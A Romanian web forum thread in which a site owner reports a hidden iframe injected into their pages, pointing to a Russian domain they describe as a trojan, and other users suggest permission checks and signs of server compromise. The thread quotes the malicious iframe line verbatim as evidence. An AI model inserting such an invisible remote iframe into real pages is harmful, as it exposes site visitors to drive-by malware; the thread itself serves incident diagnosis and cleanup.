hacked

[zgabu]

Am o mare nelamurire, si o mare mare problema. Am intrat astazi pe unul din site-urile mele, dupa mai mult timp, si am avut soc sa vad ca pe prima pagina era eroare, iar in codul sursei, in footer si index, era bagat urmatorul cod:
<IFRAME name='StatPage' src='http://stelaartois.ru/index2.php' width=5 height=5 style='display:none'></IFRAME>

stelaartois.ru/index2.php este un troian, si sursa paginii este criptata.

Cei care imi gazduiesc pagina imi spun ca ar putea fi de la codul bannerului arbomedia.
Am criptat acum si codul de la arbomedia, pana gasesc solutia la problema asta.
In plus ca fisierele footer si index nu sunt cu drept de scriere pentru altii, etc.
Voi ce parere aveti ?
Mai jos sunt atasate niste capturi

[tis]

Foarte probabil arbomedia nu are nici o legatura cu asta. Verifica permisiunile directoarelor si a fisierelor din site. Nici un fisier sa nu aiba permisiuni mai mari de 644 (exceptie fac CGI-urile) si nici un director sa nu aiba permisiuni mai mari de 755 (exceptie directoarele in care se face upload).
Am avut si eu problema asta cand cineva a reusit sa puna un script pe server (shared) si a "infectat" fisierele multor clienti care au pus permisiuni 777 pe fisiere si/sau directoare.

Verifica permisiunile si scoate manual codul din fiecare pagina. Daca ai foarte multe fisiere si acces ssh iti dau scriptul care l-am rulat eu pentru a elimina automat codul din toate fisierele.

[zgabu]

Fisierele care au fost "infestate" au permisiunea 644. Nu inteleg, cu drepturile astea, cum reusesc sa faca insert de "iframe"

[tis]

Fisierele care au fost "infestate" au permisiunea 644. Nu inteleg, cu drepturile astea, cum reusesc sa faca insert de "iframe"

In cazul asta fie are cineva parola ta, fie a fost hackerit serverul. Alta posibilitate nu exista.
Parola ta nu cred ca e accesibila (in majoritatea cazurilor nu asta e problema) dar in schimb e posibil ca cineva sa fi reusit sa acceseze serverul, sa ruleze un exploit pentru a lua UID=0 si de acolo are dreptul sa faca ce vrea, inclusiv sa modifice fisiere care nu-i apartin.
Ar trebui sa vorbesti cu firma care iti ofera hostingul sa verifice securitatea serverului... De obicei se gaseste infractorul daca se cauta in directoarele cu 777 ca nu cumva sa fie un c99shell sau ceva asemanator sau daca se da o cautare dupa fisiere binare. In mod normal fisiere binare nu ar trebui sa existe in conturile userilor si daca exista e foarte posibil sa fie un exploit.

[zgabu]

Am vorbit cu cei care imi administreaza hostingul si au verificat toate logurile si .htacces-ul. Se pare ca nici asta nu e problema. Este un cod in site care permite acel insert. Insa ma depaseste. Sa caut pe net exploitul asta, sa vad despre ce e vorba.

[tis]

Este un cod in site care permite acel insert.

Serverul banuiesc ca e pe Linux sau ceva sistem UNIX-Like...

Daca drepturile pe fisiere sunt 644 si drepturile pe directoare 755 iar fisierele si directoarele iti apartin (ca user), indiferent de vulnerabilitatea care o ai in site nu se poate modifica nici un fisier. Cand se apeleaza un script din site, este apelat ca nobody (sau ce user ruleaza apache). Daca ruleaza ca nobody si tu ai drepturile 644 inseamna ca numai tu ai dreptul sa modifici (6) cei care sunt din acelasi grup cu tine sau persoanele complet straine au dreptul doar sa citeasca continutul, nu si sa-l modifice (44). Deci, indiferent de vulnerabilitate daca nobody nu are drept de scriere in fisier (minim 606 sau 660) nu are cum sa insereze codul respectiv. Daca cei care gazduiesc site-ul ti-au spus ca e posibil, du-te si trage-i de urechi ca vorbesc prostii...

[madalin84]

Conteaza destul de mult daca serverul este facut pe Linux sau nu, deci pe ce il ai ?